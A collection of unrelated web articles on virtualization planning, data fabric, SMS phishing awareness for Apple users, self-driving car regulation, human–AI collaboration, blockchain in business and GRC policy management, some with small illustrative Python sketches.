Virtualization can play a Pivotal Role in Expansion of Businesses First off, what is virtualization? As noted by Wikipedia, "Hardware virtualization or platform virtualization refers to the creation of a virtual machine that acts like a real computer with an operating system. Software executed on these virtual machines is separated from the underlying hardware resources. For example, a computer that is running Microsoft Windows may host a virtual machine that looks like a computer with the Ubuntu Linux operating system; Ubuntu-based software can be run on the virtual machine. In hardware virtualization, the host machine is the actual machine on which the virtualization takes place, and the guest machine is the virtual machine. The words host and guest are used to distinguish the software that runs on the physical machine from the software that runs on the virtual machine. The software or firmware that creates a virtual machine on the host hardware is called a hypervisor or Virtual Machine Manager." So what does that mean for your business? There are many benefits to virtualization. • Virtualization can greatly help a business by cutting down on hardware costs. All businesses are cost conscious, and server virtualization can give a business, small or large, the opportunity to run its own software and security in-house instead of outsourcing everything to the "cloud". The cloud is wonderful when needed; however, not all businesses need the cloud. Have you heard the statement "if you own your equipment, you own your data"? The cloud also has long-term costs: you have to keep paying for it. With server virtualization you can purchase the hardware and OS (operating system) and pay it off right away. This is optimal for many companies that do not want to be paying for cloud services for months and years to come. • Virtualization is great for system admins. With virtualization, admins have a much faster infrastructure for passing data and communications, since all the server operating systems reside on one piece of hardware instead of many across the network. You can also move servers from one virtual host to another or to another piece of hardware, since a virtualized OS is basically a data file, making it easy to move around and to upgrade the server OS. Admins can also manage resources on the fly. A server does not have enough drive space? Just expand it! The server with your accounting software on it is using too much memory? Just add more memory! This can all be done at the click of a mouse, allowing a company to grow and expand easily. • Old software applications can still be used! Do you or your client have an old software application that you don't want to part with, but that can only run on an outdated OS? With virtualization you can image that old server, no matter what OS it is, and put it in a virtual environment. Now it's running off brand new hardware, and you can secure the old OS so it can still run the application without causing security issues on your network. So are you ready to take the next step to virtualization? How do you start? Start with a plan. Make sure you have a network diagram of all your current and even potential future applications, software, hardware, and IT needs in general.
For example, are you thinking about having an on-site Exchange Server? If so, you need to plan for that; and if you end up not setting up an on-site Exchange Server, you will simply have more resources for your other virtualized OSes. • AD 1 • AD 2 • Exchange Server • Accounting Software • File Server • Terminal Server Then you decide on your OS: Windows Server 2012 Datacenter, which allows for unlimited VMs; Server 2012 R2 Standard, which allows for 2 VMs; or maybe VMware vCloud Suite Enterprise. Whatever your choice, you need to make sure you know how many virtual servers you need. After the OS, you need to start thinking about hardware. Based on the number of virtual servers you will be spinning up and the applications on those servers, you will decide on the following: CPU and RAM (memory); storage (hard drive) size and type, SATA or SSD; and NICs: two? 1GB? 10GB? So what are the requirements of your virtual servers? The OS needs a certain amount of CPU, disk and throughput, and so does each software application going onto your servers. And finally, remember to take into account what the servers are being used for. A website? Will it be connected to the internet? Will a marketing department be using the server and therefore transferring a large number of images around the network? Once all is planned out, you can spin up your new hardware and servers. The world of virtualization is all yours. Just remember: backup, backup and backup!
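As a rough illustration of the sizing exercise described above, the sketch below totals the resource needs of the planned virtual servers against a single host. The per-VM figures and host capacity are invented for illustration and are not sizing recommendations for these products.

```python
# Rough capacity-planning sketch; all numbers below are assumptions.
planned_vms = {
    "AD 1":                {"vcpu": 2, "ram_gb": 4,  "disk_gb": 80},
    "AD 2":                {"vcpu": 2, "ram_gb": 4,  "disk_gb": 80},
    "Exchange Server":     {"vcpu": 4, "ram_gb": 16, "disk_gb": 500},
    "Accounting Software": {"vcpu": 2, "ram_gb": 8,  "disk_gb": 200},
    "File Server":         {"vcpu": 2, "ram_gb": 4,  "disk_gb": 1000},
    "Terminal Server":     {"vcpu": 4, "ram_gb": 16, "disk_gb": 150},
}
host = {"vcpu": 16, "ram_gb": 64, "disk_gb": 4000}  # hypothetical host

for resource in host:
    needed = sum(vm[resource] for vm in planned_vms.values())
    ok = "fits" if needed <= host[resource] else "OVER CAPACITY"
    print(f"{resource}: need {needed}, host has {host[resource]} -> {ok}")
```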
<urn:uuid:c99dbbd3-ec6b-46dd-86f3-ee7042ebd058>
CC-MAIN-2022-40
https://virtualization.cioreview.com/cioviewpoint/virtualization-can-play-a-pivotal-role-in-expansion-of-businesses-nid-13073-cid-86.html?utm_source=clicktrack&utm_medium=hyperlink&utm_campaign=linkinnews
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00652.warc.gz
en
0.924845
1,026
2.8125
3
Enterprises are producing a staggering amount of data every day. Disparate data sources, lack of access, and complex data integration challenges can prevent organizations from fully utilizing data they collect. As data continues to grow, these issues compound. A data fabric helps organizations overcome these challenges. What Is a Data Fabric? A data fabric is an integrated architecture that leverages data to provide a consistent capability across endpoints spanning a hybrid multi-cloud environment. By creating standardized practices for data management, a data fabric creates greater visibility, access, and control. Most importantly, it creates a consistency that allows data to be used and shared anywhere within your environment. Data is combined from different sources and types, to create a comprehensive single, virtual source. Regardless of the application, platform, or storage location, a data fabric architecture facilitates frictionless access and data sharing across a distributed infrastructure. Data fabric architecture simplifies analysis, especially for use with AI and machine learning, and has become a primary tool for many organizations to convert raw data into usable business intelligence. Gartner picked data fabric as its top strategic technology trend for 2022, noting that a data fabric can reduce data management efforts by as much as 70%. What’s the Difference Between a Data Fabric, Data Warehouse, and Data Lake? To understand the difference between a data fabric architecture and data warehouses or data lakes, it’s important to understand how data storage has evolved. Data warehouses are great for storing structured data and providing data in an aggregated, summary form for data analysis. However, it doesn’t work with unstructured data, which represents the majority of data collected. One of the reasons so much data goes unused is that 80% to 90% of the data collected is unstructured and doesn’t adhere to conventional data models. Data lakes made handling all types of data easier — including both structured and unstructured data —even co-locating data from disparate sources. Data lakes store and maintain replicas of the data, but do not support real-time data and can result in slow response times for some queries. Data lakes can also become a dumping ground for data (a so-called “data swamp”) with data that’s unusable. This can limit effective analysis. A data fabric overcomes these obstacles by creating unified access to processed data while maintaining localized or distributed storage. This also helps maintain data provenance. It’s not a copy of a data source, but rather a specific data set with a known and accepted state. A data fabric architecture can work with data warehouses and data lakes as well as any other data sources. Benefits of Using Data Fabric Data fabric has three notable benefits, including: - A unified, self-service data source - Automated governance and security - Automated data integration Unified, Self-Service Data Source Data fabric pulls together data from disparate sources into one unified source, which makes discovering, processing, and using data easier. It democratizes data by putting it into the hands of users who need it. Based on access policies and controls, data is accessible to anyone authorized for access. The 2021 Forrester Total Economic Impact, commissioned by IBM, estimates the potential ROI of using a data fabric for a unified, self-service data source at more than 450% providing a benefit to enterprise organizations of $5.8 million. 
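To make the idea of a single virtual access point over distributed sources more concrete, here is a purely conceptual sketch; the catalog structure, source names, and records are invented for illustration and do not represent any particular data fabric product.

```python
# Conceptual sketch only: a thin access layer answers queries from whichever
# source holds the data, without copying it into a central store.
warehouse = {"orders": [{"id": 1, "customer": "Acme", "total": 120.0}]}
data_lake = {"clickstream": [{"customer": "Acme", "page": "/pricing"}]}

CATALOG = {"orders": warehouse, "clickstream": data_lake}  # unified metadata

def query(dataset, **filters):
    """Fetch matching records from the source that holds the dataset."""
    source = CATALOG[dataset]
    return [row for row in source[dataset]
            if all(row.get(k) == v for k, v in filters.items())]

# One access point, two underlying stores:
print(query("orders", customer="Acme"))
print(query("clickstream", customer="Acme"))
```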
Automated Data Governance and Security Localized governance and security can remain in place. This allows you to ensure specific governance and security rules are followed regardless of where the data is accessed. At the same time, you can also create holistic data management policies for governance and security at an enterprise-wide level. With automated data governance and security rules in place, companies remain in compliance and reduce the risk of data exposure. Automated Data Integration By automating (and augmenting) data integration tasks, data scientists and data engineers can significantly reduce manual workloads. Optimized data integration accelerates data delivery and occurs in real time, so data is always in sync. Why Use Data Fabric? Data fabric helps organizations leverage the power of their accumulated data across a local, hybrid cloud and/or multi-cloud environment. By modernizing storage and data management, a data fabric creates significant efficiencies for business, management, and organizational practices. Data is processed quickly and efficiently with automated pipeline management, resulting in significant time savings. Automated pipeline management also allows users to gain a real-time, 360-degree view of their data. For example, whether users want to understand their customers or their supply chains better, a data fabric provides a holistic view with access to every data point. A data fabric also creates cost efficiencies by lowering the total cost of ownership (TCO) of scaling and maintaining legacy systems rather than modernizing them incrementally. Data Management Efficiencies Data processing, cleaning, transformation, and enrichment are tedious and repetitive. Automating data preparation removes much of this burden. A well-designed data fabric architecture can also support significant scale, since data can be stored on-premises or in multi-cloud or hybrid environments. A well-designed architecture allows organizations to store data where it is most efficient and cost-effective without sacrificing access. Creating a consistent and common data language allows users to derive greater value. A data fabric creates a semantic abstraction layer that can translate data complexity into easy-to-understand business language, making data more useful to those without deep data training and experience. Data Fabric Use Cases The most common use case for a data fabric is to create a virtual database for centralized business management. Distributed data sources still maintain accessibility for local or regional use while also being accessible to the organization at large. Organizations that have a distributed workforce or regional segmentation often choose this approach while allowing for central access, coordination, and management of data. Another common use case is when mergers or acquisitions occur. A data fabric strategy can unify disparate sources by bringing the information from the acquired company into the virtual data store without having to replace legacy architecture. While creating unified and harmonized data always requires some level of effort, a data fabric allows for seamless and centralized data access within and throughout the entire enterprise. Artificial Intelligence and Machine Learning AI relies on robust, high-integrity data, but models are only as good as the data their algorithms are fed. A data fabric architecture provides data scientists with the broad, integrated data they need for efficient data delivery.
Since so much of machine learning revolves around the logistics of data, a data fabric provides the best solution to manage data complexity. Implementing a Data Fabric Strategy As remote work, distributed workforces, and digital business channels continue to grow, it creates a complex and diverse data ecosystem. Add in IoT, sensors, and evolving technology that creates data at a blinding rate, and you can easily create an unmanageable mess of data. By using a data fabric layer on top of everything, you can overcome these challenges to bring together various data sources across cloud and location boundaries. Implementing a data fabric strategy allows organizations to modernize without having to disrupt or replace legacy systems. You can unify and access your data virtually whether it lives on-prem, in the cloud, or in hybrid or multi-cloud platforms. Data fabrics provide a holistic view of data, including real-time data, reducing the time required to discover, query, and deploy innovative strategies and providing deeper data analysis that creates better business intelligence. To learn more about data fabric visit our website for more information on how our team can help you.
<urn:uuid:6673f140-12d2-4c12-b5fb-a02d5aa886d2>
CC-MAIN-2022-40
https://convergetp.com/2022/06/16/what-is-a-data-fabric-and-why-do-i-need-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00652.warc.gz
en
0.904264
1,582
2.78125
3
By Michael Hall, Chief Information Security Officer If you're a regular reader of our blog, you are already familiar with phishing emails from an article we posted earlier this year, Don't Get Caught by Phishing or Other Email Attacks. Phishing is a tactic used by criminals to disguise themselves in a way that makes a victim trust them, and then trick that victim into providing valuable personal information: - Credit card information - Bank account information - Login and password information - Social Security Number - Anything else that might be valuable What you may not realize is that phishing isn't confined to emails and web browsing. Every day, people are fooled on their phones through spoofed text messages. Spoofed messages are sometimes easy to spot, but not always. These fraudulent communications look like they come from a trusted source or someone you know, but they are not what they appear to be. For example, never trust messages that claim to be from your bank that include links or ask for information. Instead of replying with your personal info or going to the link, try calling your bank directly to discuss the content of the text. Use a phone number from your bank card or statement. This security protocol applies to messages from any number you don't recognize. You should constantly be on guard, especially for some new phishing attempts via iMessage that look authentic but are actually bogus messages designed to steal your personal or financial information. Here's an example of a current phishing attempt that iPhone users are receiving via iMessage. This scheme is kind of a tricky one. Aside from the pretty bad fake Apple domain ("appleid.ios-icloud-server.com/us"), it seems like a legitimate message you might get from Apple. However, this is not an authentic communication from Apple. It's a fake: don't open it! If you receive a message like this or any other message that you're not 100% certain about, don't use the included link. Instead, log into your Apple ID account directly at https://appleid.apple.com/. From there, you can verify all of your logged-in devices. In fact, we would recommend that users do this a few times a year as a matter of habit, just to keep tabs on their devices. If you'd like to make your Apple ID more secure, two-factor authentication is a simple way to do that. Once you have it set up, two-factor verification will be required any time you sign in to manage your Apple ID, sign into iCloud or make an iTunes, iBooks or App Store purchase from a new device. - You enter your password - Apple sends a unique access code to a device that you have previously designated with Apple as a "trusted device" - You enter the access code on the login page As described on the Apple Support website, you can follow the steps below to turn on two-factor authentication. On your iPhone, iPad, or iPod touch with iOS 9 or later: - Go to Settings > iCloud > tap your Apple ID - Tap Password & Security - Tap Turn on Two-Factor Authentication On your Mac with OS X El Capitan or later: - Go to Apple () menu > System Preferences > iCloud > Account Details - Click Security - Click Turn on Two-Factor Authentication Visit Apple's two-factor authentication support page for more information. If you receive a junk/phishing message on your device, block the sender's number. Here's how to do that on an iOS device, like an iPhone or iPad.
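The spoofed-domain example above ("appleid.ios-icloud-server.com") comes down to checking whose domain a link really points to. The sketch below illustrates just that one check; it is an illustrative assumption on our part, not an Apple tool, and it is not a complete phishing defense.

```python
# Minimal sketch: treat a link as Apple's only if its host is apple.com or
# a subdomain of it. Illustrative only; real phishing defense needs more.
from urllib.parse import urlparse

def looks_like_apple(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host == "apple.com" or host.endswith(".apple.com")

print(looks_like_apple("https://appleid.apple.com/"))                # True
print(looks_like_apple("https://appleid.ios-icloud-server.com/us"))  # False
```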
<urn:uuid:25cac09b-f452-4416-bb6b-ab64ba3f4774>
CC-MAIN-2022-40
https://drivesaversdatarecovery.com/sms-text-phishing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00652.warc.gz
en
0.88942
800
3.046875
3
Last month, an Uber self-driving car struck and killed pedestrian Elaine Herzberg in Tempe, Arizona. The tragedy highlights the need for a fundamental rethink of the way the federal government regulates car safety. The key issue is this: the current system is built around an assumption that cars will be purchased and owned by customers. But the pioneers of the driverless world—including Waymo, Cruise, and Uber—are not planning to sell cars to the public. Instead, they're planning to build driverless taxi services that customers will buy one ride at a time. This has big implications for the way regulators approach their jobs. Federal car regulations focus on ensuring that a car is safe at the moment it rolls off the assembly line. But as last month's crash makes clear, the safety of a driverless taxi service depends on a lot more than just the physical features of the cars themselves. For example, dash cam footage from last month's Uber crash showed the safety driver looking down at her lap for five agonizing seconds before the fatal crash. Should Uber have done more to train and supervise its safety drivers? Should Uber have continued to put two people in each car, rather than switching to a single driver? Not only are there no federal rules on these questions, at the time of the crash the public was completely in the dark about how Uber and its competitors were dealing with the issue. That was partly because the current administration has a philosophical commitment to minimal regulation. But it's also because the current legal framework—developed under both Democratic and Republican administrations—isn't designed to address this kind of issue. Right now, Congress is considering legislation to exempt tens of thousands of self-driving cars from conventional car safety regulations. It's a reasonable idea. Those regulations really are a poor fit for fully autonomous vehicles, and the technology is changing so fast that any regulations written today are likely to be obsolete in a few years. But in exchange for this regulatory relief, Congress should insist on a lot more scrutiny for the testing and deployment of self-driving cars. Driverless car advocates worry, correctly, that premature regulation could hamper the development of this potentially life-saving technology. But officials could do a lot more to promote transparency and provide oversight without hampering progress. Why conventional regulations don't work for driverless cars Federal car safety regulation has traditionally been based on a thick book of rules called the Federal Motor Vehicle Safety Standards (FMVSS). These regulations, developed over decades, establish detailed performance requirements for every safety-related part of a car: brakes, tires, headlights, mirrors, airbags, and a lot more. Before a car can be introduced into the market, the manufacturer must certify that the vehicle meets all of the requirements in the current version of the FMVSS. A carmaker must certify that the brakes can stop the car within a certain number of feet, that airbags can deploy safely with passengers of various heights, that the tires can run for many hours without overheating, and so forth. Federal regulations don't say much about how companies develop and test cars before bringing them to market. In the era of conventional cars, they didn't need to. Development and testing was generally conducted on private test tracks where they posed no danger to the public. 
Then car companies would provide the government with documentation that the car met the standards in the FMVSS before putting them on the market. But that approach doesn't work for driverless cars. Companies can do some testing of driverless cars on a closed course, but it's impossible to reproduce a full range of real-world situations in a private facility. So at some point, carmakers need to put self-driving cars on public roads for testing purposes—before a manufacturer is able to clearly demonstrate that they're safe. In effect, this makes the public involuntary participants in a dangerous research project. So far, the approach favored by most driverless car advocates has been for federal officials to simply throw up their hands at this problem. Legislation passed by the House last September, and companion legislation currently stalled in the Senate, would carve out broad exemptions from the FMVSS for driverless cars (the legislation would require manufacturers to submit a "safety report" explaining key safety features of fully self-driving vehicles). Again, there's some logic to this. It's true that some FMVSS requirements don't make sense for fully driverless cars, and it will take years to update the rules. But updating the FMVSS is neither necessary nor sufficient for effective regulation of driverless cars. It's perfectly possible to make an FMVSS-compliant driverless car by starting with a conventional car (which already meets all FMVSS requirements) and adding self-driving gear to it. In fact, Waymo is planning to do exactly that for its Phoenix taxi service with a fleet of Chrysler Pacifica minivans. At the same time, there are many important aspects of running a driverless taxi service that aren't addressed at all by the FMVSS: - Protecting driverless cars from cyberattacks not only depends on the architecture of cars themselves, it also depends on the operational security of the systems used to update the car's onboard software. - Driverless car safety will depend on the accuracy and timeliness of updates to cars' onboard maps. - Companies need a rigorous process for testing safety-critical components on cars in the field and replacing them when they fail. - Companies need a system for thoroughly investigating crashes and other anomalies and updating the car's software to make sure problems don't get repeated. - During the testing phase, safety depends on the training and supervision of safety drivers. - Once the commercial service is launched, safety may depend on the competence of staffers overseeing cars from a remote operations center. - Driverless car companies need plans for dealing with emergency situations and interacting with first responders. Most of these issues aren't covered by the FMVSS—and they probably shouldn't be either. The FMVSS is supposed to focus on objective metrics—like stopping distance—that can be measured in a lab or on a test track. But no numerical measurement can capture how rigorous a company's cybersecurity policies are or how thoroughly a company performs post-crash investigations. Moreover, the technology is so new that it would be a mistake to write detailed regulations on any of these topics now. But what regulators could do is focus on transparency and oversight. If the public is going to share the road with potentially dangerous driverless cars, we should at least have timely and detailed information about how those vehicles are performing and what steps companies are taking to protect public safety.
<urn:uuid:fb66ffec-0951-4a6e-a043-99b69dcd12ec>
CC-MAIN-2022-40
https://arstechnica.com/cars/2018/04/the-way-we-regulate-self-driving-cars-is-broken-heres-how-to-fix-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00052.warc.gz
en
0.961951
1,364
2.890625
3
The relationship between humans and AI is something of a dance. We and AI come close together operating collaboratively, then are pushed away by the impossibility, only to stumble but return attracted by the potential. It is perhaps fitting that the dance community is beginning to embrace robots, with AI helping to create new movements and choreography, and with robots sharing the stage with human dancers. The relationship between society and technology is yin and yang, with every massive enhancement accompanied by the potential for danger. AI, for example, offers the promise to end boring, repetitive jobs, enabling us to engage in higher level and more fulfilling tasks. It helps with any number of efficiency efforts, such as fraud detection, and it can even paint masterpiece artworks and compose symphonies. Sam Altman, CEO of OpenAI, hopes AI will unlock human potential and let us focus on the most interesting, most creative, most generative things. Wired co-founder Kevin Kelly has argued that technology, and by extension AI, is a projection of the human mind. The argument is that technology stems organically, authentically, and follows patterns found in man and nature. It is a means by which humans gain control over their environment both for safety but also for advantage. The technology we produce is a natural biological engine of human evolution and a leading cause of change limited only by our imaginations. The positive versus negative polarity of how the technology is applied, the yin and yang, is an expression of the dualistic human mind. However the dichotomy between humans and robots, between natural and artificial does create conflict. The tension between the innate drive to develop and use AI-enabled technology and the potential for it to surpass us creates an understandable emotional turmoil. This stew powers the dance and informs the ongoing industry dialogue about how best to utilize and control AI. In effect, the discussion is about who leads. Today, while AI is mostly still in its infancy, people are in control, but the concerns are about who leads the dance in the future. As AI rapidly develops, the pressure to use it to drive greater advantage grows, as do the existential worries. In “The Master Algorithm,” computer scientist and University of Washington Professor Pedro Domingos assures us that “humans are not a dying twig on the tree of life. On the contrary, we are about to start branching. In the same way that culture coevolved with larger brains, we will coevolve with our creations. We always have: Humans would be physically different if we had not invented fire or spears. We are Homo technicus as much as Homo sapiens.” In this he suggests that humans will always lead, no matter how advanced AI becomes. It is this synergy that underlies a belief in collaboration between humans and machines, a dance pairing with each excelling in ways unique to their strengths. This has given rise to the idea of machines as teammates. The idea is that such collaboration could sustainably augment humans and generate positive benefits for individuals, organizations, and societies. That might work – unless man and machine merge. Philosopher Jason Silva says that AI will change our scope of possibilities in ways we are only starting to glimpse and will lead to a merging between man and machine. Certainly, Elon Musk believes this is both possible and a necessary direction. 
Though the near-term goal of his Neuralink company and others is to build a brain-computer interface that can help people with specific health conditions, longer-term he has a grander vision. Specifically, he believes this interface will be necessary for humans to keep pace with increasingly powerful AI. Such a development could redefine the relationship between humans and machines, with the merged combination giving rise to a higher form of AI-powered intelligence. In effect, a fusion of the dancers. Among other things, this would also have huge implications for religion. If God created human beings in God’s own image and humans create robots in our image, what does that make them in the eyes of religion? And what does that make a merged creation? Perhaps that is one of the reasons why the Pope recently urged people to pray that robots and artificial intelligence respect the dignity of the person and always serve mankind. Even if there is not this direct physical connection between humans and AI, there is still a growing symbiosis. Researchers are starting to build hybrid collaborative systems that combine the best of an AI model’s superpowers with human intuition. In this, humans contribute leadership, teamwork, creativity, and social skills and machines lead with speed and scalability. A new line of research has a vision of a society in which people are living seamlessly with machines. Though admittedly still some years off, in this vision the AI is merged with an intelligent body to create new types of robots that have properties comparable to those of intelligent living organisms, possibly a step towards creating Replicants with all the implications as imagined by Philip K. Dick in Do Androids Dream of Electric Sheep? that also inspired the Blade Runner movies. This requires what the researchers call Physical AI, combining knowledge from materials science, mechanical engineering, computer science, biology and chemistry. According to a new paper, these robots would be designed to look and behave like humans or other animals and would possess intellectual capabilities normally associated with biological organisms. The goal, according to the paper, is to build robots that could exist like benevolent animals together with nature and people. How might we move towards this higher self – this symbiotic future of natural and artificial? The drive of human imagination, and the onward march of human technology towards what was once science fiction is revealing the possibility of a new dance.
Blockchain is a revolutionary technology that promises to help businesses reduce risk while maintaining data transparency, privacy and security. It offers several opportunities that businesses can use to improve their processes. Because data privacy is a top concern for any business, many are trying to incorporate blockchain into their operations, and companies across industries such as healthcare, telecom, supply chain and IT are adopting it to overhaul existing business operations and data handling. This article explores the impact of blockchain on business.
Blockchain is often ranked among the top emerging technologies worldwide and has brought changes to finance, healthcare, banking, accounting and other sectors, irrespective of company size, nature or geographical location. A blockchain is a growing list of records linked using cryptography. Each record, known as a block, is connected to the previous block. Transaction data is time-stamped and secured between two parties because the structure resists modification of past data. Blockchain is considered secure because it is managed by a peer-to-peer network and its records are effectively unalterable.
Blockchain, together with digital currencies, is expected to improve industry standards and the structure of global business. According to industry experts, the lack of international standards remains a big obstacle to worldwide adoption of blockchain technologies; as those standards take shape, they will help transform small, mid-size and large businesses alike. The following sectors are already implementing this technology to improve and optimize their operations.
Finance. Blockchain has made major changes in the financial industry. Financial companies can complete faster transactions because blockchain has changed the way banking services work: it provides a way for unknown and untrusting parties to agree on the state of a transaction database without a middleman. Transactions become faster and more secure for consumers and businesses, and major payment networks, stock exchanges and money transfer services are using blockchain to reduce transaction fees and make payments faster and more secure.
Accounting. Accounting is a challenging task for any business. Several accounting firms use blockchain to manage complex tax codes, invoices, bills and income tax files, where accuracy and precision are paramount. Accounting professionals use these new tools to audit and validate transactions and save time; Rubix is one example of blockchain software aimed at accounting.
HR and payroll. Blockchain can also be used in HR and resource management. Hiring professionals can use it to quickly verify credentials provided by candidates and employees, helping to catch inaccurate data without relying on third-party verification companies. Multinationals and large organisations with thousands of employees working across countries need a robust payroll system, and blockchain-based systems and tools can simplify payroll and payment transactions in different currencies. WorkChain and Aworker are examples of automated, blockchain-based payroll systems that let employees receive their pay when they complete the work assigned; they are multichain-validated data processing platforms that run on peer-to-peer networks.
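To make the chained, hash-linked record structure described above concrete, here is a minimal Python sketch. It is an illustration only (real blockchains add consensus, peer-to-peer distribution and much more), and the transaction fields are invented for the example.

```python
import hashlib
import json
import time

def make_block(data, previous_hash):
    """Create a block whose hash covers its own contents and the previous block's hash."""
    block = {
        "timestamp": time.time(),
        "data": data,
        "previous_hash": previous_hash,
    }
    payload = json.dumps(block, sort_keys=True).encode()
    block["hash"] = hashlib.sha256(payload).hexdigest()
    return block

# Build a tiny chain of time-stamped transaction records.
genesis = make_block({"note": "genesis"}, previous_hash="0" * 64)
payment = make_block({"from": "A", "to": "B", "amount": 10}, genesis["hash"])

# Tampering with an earlier block breaks every later link.
genesis["data"]["note"] = "edited"
recomputed = hashlib.sha256(
    json.dumps({k: genesis[k] for k in ("timestamp", "data", "previous_hash")},
               sort_keys=True).encode()
).hexdigest()
print(recomputed == payment["previous_hash"])  # False: the chain detects the change
```

The same linkage is what makes the time-stamped transaction records described above resistant to modification: changing any historical block invalidates every block that follows it.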
Asset management and logistics. Asset management is a critical task for any logistics company: what is the status of material in inventory, when did it arrive, and where will it move next? Asset data needs to be accurate and must not be alterable. Giant shipping companies are working on blockchain systems to track the shipping containers moving around the world; systems being developed by IBM and Digital Asset would host a chain of data rather than rely on traditional asset management tools. Companies that store, manage and ship valuable assets are adopting blockchain security standards and records because, as business volumes grow, traditional software struggles to handle records that go through multiple edits and updates. Blockchain will transform this industry.
Management and operations. Top management and operations are among the most crucial departments of any organisation. Blockchain helps streamline internal operations and reduce friction in sharing business-critical information. It allows management to maintain a private, shared ledger with historical versions, preserving the authenticity and transparency of information; in this way, businesses build the level of trust needed to achieve their goals and targets. Blockchain also provides a secure and safe environment for management and operations to share confidential information with other departments in the company and with offices in other countries.
Contract management. Blockchain is shaping the next generation of contract management. Digital contracts are the bridge between two organisations, and blockchain provides new infrastructure for doing business smoothly. Smart contracts are built on shared blockchain databases; for example, Accenture has developed a unified solution that lets businesses sign blockchain-enabled smart contracts. A contract can be revised and changed, with every change captured in a ledger, generating a notification and shared transparently. All participating parties keep a shared ledger of all activity in the contract, and the final contract can be stored in one place with all recorded versions and activities, maintaining transparency. Contracts matter most when two business parties must agree on common conditions and rules to be followed; they involve terms, additional supporting documents, proofs and a number of revisions shared between parties. Blockchain-based smart contracting solutions are improving how businesses process such complex contracts.
Blockchain technology has the potential to transform the foundations and structure of global industries. As international industries adopt it, this revolution will change how data is handled, secured and recorded. Businesses need to follow this innovation: blockchain and digital currencies can make business processes faster, more secure and more efficient, helping to build a strong economy.
The Foundational Role of Policies in GRC Strategies
Policies are critical to the organization as they establish boundaries of behavior for individuals, processes, relationships, and transactions. Starting at the policy of all policies – the code of conduct – they filter down to govern the enterprise, divisions/regions, business units, and processes. GRC, by definition, is “a capability to reliably achieve objectives [governance] while addressing uncertainty [risk management] and acting with integrity [compliance].” Policies are a critical foundation of GRC. When properly managed, communicated, and enforced, policies:
- Provide a framework of governance. Policy paints a picture of the behavior, values, and ethics that define the culture and expected conduct of the organization; without policy there are no consistent rules and the organization goes in every direction.
- Identify and treat risk. The existence of a policy means a risk has been identified and is significant enough to warrant a formal written policy that details the controls to manage it.
- Define compliance. Policies document compliance by describing how the organization meets requirements and obligations from regulators, contracts, and voluntary commitments.
Unfortunately, most organizations do not connect the idea of policy to the establishment of corporate culture. Without policy, there is no written standard for acceptable and unacceptable conduct — an organization can quickly become something it never intended. Policy also attaches a legal duty of care to the organization and cannot be approached haphazardly. Mismanagement of policy can introduce liability and exposure, and noncompliant policies can and will be used against the organization in legal (both criminal and civil) and regulatory proceedings. Regulators, prosecuting and plaintiff attorneys, and others use policy violation and noncompliance to place culpability. An organization must establish policy it is willing to enforce — but it must also clearly train on and communicate the policy to make sure that individuals understand what is expected of them. An organization can have a corrupt and convoluted culture despite good policy, but it cannot achieve a strong, established culture without good policy and training on that policy.
Hordes of Policies Scattered Across the Organization
Policies matter. However, looking at the typical organization, you would think policies are irrelevant and a nuisance. The typical organization has:
- Policies managed in documents and fileshares. Policies are haphazardly managed as document files dispersed across fileshares, websites, local hard drives, and mobile devices. The organization has not fully embraced centralized online publishing and universal access to policies and procedures. There is no single place where an individual can see all the policies in the organization and those that apply to specific roles.
- Reactive and inefficient policy programs. Organizations often lack any coordinated policy training and communication program. Instead, different departments develop and communicate their training without thought for the bigger picture or alignment with other areas.
- Policies that do not adhere to a consistent style. The typical organization has policies that do not conform to a corporate style guide and standard template that would require policies to be presented clearly (e.g., active voice, concise language, and an eighth-grade reading level).
- Rogue policies. Anyone can create a document and call it a policy. Because policies establish a legal duty of care, organizations face misaligned policies, exposure, liability, and other rogue policies that were never authorized.
- Out-of-date policies. In most cases, published policy is not reviewed and maintained on a regular basis. In fact, most organizations have policies that have not been reviewed in years for applicability, appropriateness, and effectiveness. The typical organization has policies and procedures without a defined owner to make sure they are managed and current.
- Policies without lifecycle management. Many organizations maintain an ad hoc approach to writing, approving, and maintaining policy. They have no system for managing policy workflow, tasks, versions, approvals, and maintenance.
- Policies that do not map to exceptions or incidents. Organizations are often missing an established system to document and manage policy exceptions, incidents, issues, and investigations. The organization has no information about where policy is breaking down and how it can be addressed.
- Policies that fail to cross-reference standards, rules, or regulations. The typical organization has no historical or auditable record of policies that address legal, regulatory, or contractual requirements. Validating compliance to auditors, regulators, or other stakeholders becomes a time-consuming, labor-intensive, and error-prone process.
Inevitable Failure of Policy Management
Organizations often lack a coordinated enterprise strategy for policy development, maintenance, communication, attestation, and training. An ad hoc approach to policy management exposes the organization to significant liability. This liability is intensified by the fact that today’s compliance programs affect every person involved in supporting the business, including internal employees and third parties. To defend itself, the organization must be able to show a detailed history of what policy was in effect, how it was communicated, who read it, who was trained on it, who attested to it, what exceptions were granted, and how policy violations and resolutions were monitored and managed. If policies do not conform to an orderly style and structure, use more than one vocabulary, are located in different places, and do not offer a mechanism to gain clarity and support (e.g., a policy helpline), organizations are not positioned to drive desired behaviors in corporate culture or enforce accountability. With today’s complex business operations, global expansion, and ever-changing legal, regulatory, and compliance environments, a well-defined policy management program is vital to enable an organization to develop and maintain the wide gamut of policies it needs to govern with integrity. The bottom line: the haphazard department- and document-centric approaches of the past compound the problem rather than solve it. It is time for organizations to step back and approach policy management with a strategy and architecture for managing the ecosystem of policy programs throughout the organization, with real-time information about policy conformance and its impact on the organization.
Check out GRC 20/20’s additional policy management resources . . .
- This is a complimentary full-day interactive workshop to help organizations define a policy management strategy, write a policy on writing policies (meta-policy), define a policy management lifecycle, understand the role of technology in policy management, and build a business case for policy management. This workshop is only open to individuals managing policies in their internal environment and is not open to solution providers or consultants.
Research Briefing: How to Purchase Policy Management Solutions & Platforms
- This is GRC 20/20’s on-demand Research Briefing that advises organizations on what to consider in evaluating and selecting policy management solutions and technologies. It reviews the critical capabilities needed in policy management technology as well as what differentiates a basic, common, and advanced solution in the market. Particular guidance is given on considerations when engaging solution providers and navigating solution provider hyperbole.
